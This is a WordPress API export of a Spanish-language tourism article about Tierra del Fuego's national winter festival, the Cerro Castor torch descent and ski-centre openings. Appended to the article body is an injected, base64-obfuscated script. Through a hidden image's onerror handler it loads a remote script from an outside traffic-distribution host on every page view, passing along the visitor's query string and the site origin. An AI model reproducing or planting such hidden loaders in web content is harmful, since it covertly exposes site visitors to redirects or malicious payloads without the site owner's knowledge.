{"id":8358,"date":"2024-06-26T19:23:25","date_gmt":"2024-06-26T22:23:25","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=8358"},"modified":"2025-08-13T15:42:21","modified_gmt":"2025-08-13T18:42:21","slug":"tierra-del-fuego-se-prepara-para-celebrar-la-fiesta-nacional-del-invierno","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=8358","title":{"rendered":"Tierra del Fuego se prepara para celebrar la Fiesta Nacional del Invierno"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-cyan-bluish-gray-background-color has-background\"><em>En este sentido indic\u00f3 que desde el Infuetur se est\u00e1 trabajando fuertemente con la promoci\u00f3n del destino a trav\u00e9s de los centros invernales y toda la oferta de actividades que brinda cada uno.\u00a0<\/em><\/h4>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/imagen-1.jpg\"><img decoding=\"async\" width=\"1024\" height=\"913\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/imagen-1-1024x913.jpg\" alt=\"\" class=\"wp-image-8359\" style=\"width:331px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/imagen-1-1024x913.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/imagen-1-300x268.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/imagen-1-768x685.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/imagen-1-696x621.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/imagen-1-1068x953.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/imagen-1-471x420.jpg 471w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/imagen-1-320x285.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/imagen-1-480x428.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/imagen-1-800x713.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/imagen-1.jpg 1193w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>\u00abDesde el inicio de a\u00f1o hemos comenzado a trabajar en la difusi\u00f3n de nuestra temporada de invierno promocionando la oferta del destino en una presentaci\u00f3n que se realiz\u00f3 en mayo en Buenos Aires donde lo que se busc\u00f3 fue captar nuevas agencias que vendan el destino y afianzar nuevos productos en los operadores que ya trabajan con el destino Fin del Mundo\u00bb asegur\u00f3.&nbsp;<\/p>\n\n\n\n<p>Adem\u00e1s, Querciali indic\u00f3 que \u00abse realiz\u00f3 una fuerte comunicaci\u00f3n de la Fiesta Nacional del Invierno donde damos inicio a la temporada de hielo y nieve con toda una semana de actividades junto a centros invernales y prestadores, siendo el evento central el 9 de julio con m\u00faltiples actividades y la tradicional bajada de antorchas en el Cerro Castor, quienes adem\u00e1s tambi\u00e9n celebran este a\u00f1os 25 aniversario por lo cual es un adicional que se suma a esta celebraci\u00f3n\u00bb.&nbsp;<\/p>\n\n\n\n<p>\u00abLa Fiesta Nacional del Invierno fue declarada de inter\u00e9s nacional por el Ministerio de Turismo y Deportes de la Naci\u00f3n, lo cual le otorga una impronta especial a este evento y se calendariza para que los viajeros tengan en cuenta este evento a la hora planificar su viaje. En el caso de los residentes la bajada de antorchas se ha vuelto un encuentro familiar donde se pueden disfrutar de la nieve, el hielo y las diferentes propuestas que organizamos junto a Cerro Castor y los tres municipios de Ushuaia, Tolhuin y R\u00edo Grande\u00bb explic\u00f3 el funcionario.&nbsp;<\/p>\n\n\n\n<p>Es importante destacar que las actividades se desarrollar\u00e1n a partir del d\u00eda 4 hasta el 12 de julio con el Festival de Escultura en Hielo en Tolhuin. Para m\u00e1s informaci\u00f3n invitamos a visitar la renovada web promocional&nbsp;<a href=\"https:\/\/infuetur.gob.ar\/noticias\/www.findelmundo.tur.ar\">www.findelmundo.tur.ar<\/a>&nbsp;&nbsp;en su formato Invierno con una secci\u00f3n especial de la Fiesta Nacional del Invierno donde podr\u00e1n encontrar la historia de esta celebraci\u00f3n, descuentos para residentes, las actividades previstas y el traslado con una tarifa diferencial.<\/p>\n\n\n\n<p>Para culminar el Presidente del Instituto hizo extensiva la invitaci\u00f3n a toda la comunidad de Tierra del Fuego a participar de las diferentes propuestas para celebrar el invierno y acompa\u00f1ar la baja de antorchas el d\u00eda 09 de julio en el Cerro Castor a partir de las 13 horas.<\/p>\n\n\n\n<p><strong><em>Novedades de los Centros Invernales&nbsp;<\/em><\/strong><\/p>\n\n\n\n<p>Cabe mencionar que los centros invernales en la Reserva Natural de Tierra Mayor y en Glaciar Martial se encuentran brindando actividades para toda la familia.&nbsp;<\/p>\n\n\n\n<p>Este jueves abre sus instalaciones el Cerro Martial, que brinda actividades en escuela de ski y snowboard, ski lift, circuito de raquetas, pistas de trineos, snowpark, splintboard y ski de traves\u00eda, y cuenta con rental.<\/p>\n\n\n\n<p>Mientras que Cerro Castor abre sus puertas el d\u00eda viernes con novedades, con la instalaci\u00f3n y ampliaci\u00f3n de la red de nieve artificial llegando al 35% de cobertura total de la superficie esquiable.<\/p>\n\n\n\n<p>Adem\u00e1s, como parte del plan de inversiones, se ampli\u00f3 la capacidad del Restaurant Viejo Castor, y refacciones del caf\u00e9\/resto Snowbar, ubicado en la base. A su vez, se realizaron trabajos para la instalaci\u00f3n de la nueva telesilla cu\u00e1druple que acompa\u00f1ar\u00e1 a los Teleski del sol y del este, prevista para la temporada 2025.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/infuetur.gob.ar\/assets\/img\/infuetur-navbar.png\" alt=\"\" \/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En este sentido indic\u00f3 que desde el Infuetur se est\u00e1 trabajando fuertemente con la promoci\u00f3n del destino a trav\u00e9s de los centros invernales y toda la oferta de actividades que brinda cada uno.\u00a0 \u00abDesde el inicio de a\u00f1o hemos comenzado a trabajar en la difusi\u00f3n de nuestra temporada de invierno promocionando la oferta del destino [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":8360,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[],"class_list":["post-8358","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-patagonia"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8358","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8358"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8358\/revisions"}],"predecessor-version":[{"id":10141,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8358\/revisions\/10141"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/8360"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8358"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8358"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8358"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}